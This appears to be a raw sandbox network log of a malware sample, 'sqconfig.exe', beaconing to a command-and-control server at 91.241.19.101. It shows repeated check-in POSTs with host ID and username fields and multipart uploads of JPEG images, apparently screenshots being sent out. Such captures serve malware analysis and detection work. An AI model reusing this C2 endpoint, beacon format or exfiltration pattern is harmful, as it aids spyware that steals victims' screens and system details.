                                                                  Sep 30, 2021 23:54:04.678033113 CEST20162OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:04.678090096 CEST20165OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:04.804702044 CEST20168OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:04.804788113 CEST20181OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:04.805021048 CEST20185OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:04.805139065 CEST20191OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:04.930007935 CEST20196OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:04.930195093 CEST20199OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:54:04.930444956 CEST20215OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:54:05.135538101 CEST20240INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  216192.168.2.35005291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:05.015268087 CEST20239OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:05.228163958 CEST20240INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  217192.168.2.35005491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:05.677656889 CEST20241OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:05.677817106 CEST20241OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:05.677992105 CEST20251OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:05.678090096 CEST20254OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:05.793565035 CEST20270OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:05.793704987 CEST20273OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:05.793764114 CEST20275OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:54:05.793983936 CEST20280OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:05.909060955 CEST20283OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:05.909122944 CEST20291OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:54:05.909323931 CEST20309OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:54:06.089277983 CEST20329INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  218192.168.2.35005391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:05.679862022 CEST20254OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:05.898998976 CEST20280INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  219192.168.2.35005591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:06.129862070 CEST20329OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:06.307518005 CEST20330INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  22192.168.2.34978191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:56.144249916 CEST7784OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:56.318934917 CEST7785INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:52:56.403580904 CEST7785OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----85e8c95abb4d0498d71f1d5dacd6f5e6
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 93053
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:56.409457922 CEST7785OUTData Raw: 2d 2d 2d 2d 2d 2d 38 35 65 38 63 39 35 61 62 62 34 64 30 34 39 38 64 37 31 66 31 64 35 64 61 63 64 36 66 35 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------85e8c95abb4d0498d71f1d5dacd6f5e6Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:56.409672976 CEST7795OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:56.409754038 CEST7798OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:56.533977985 CEST7879OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:56.534012079 CEST7881OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:56.534190893 CEST7889OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:56.534219980 CEST7892OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:52:56.534231901 CEST7895OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:56.534374952 CEST7900OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:52:56.659368992 CEST7907OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:52:56.862623930 CEST7959INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  220192.168.2.35005691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:06.426887989 CEST20331OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:06.427097082 CEST20331OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:06.427602053 CEST20341OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:06.427936077 CEST20343OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
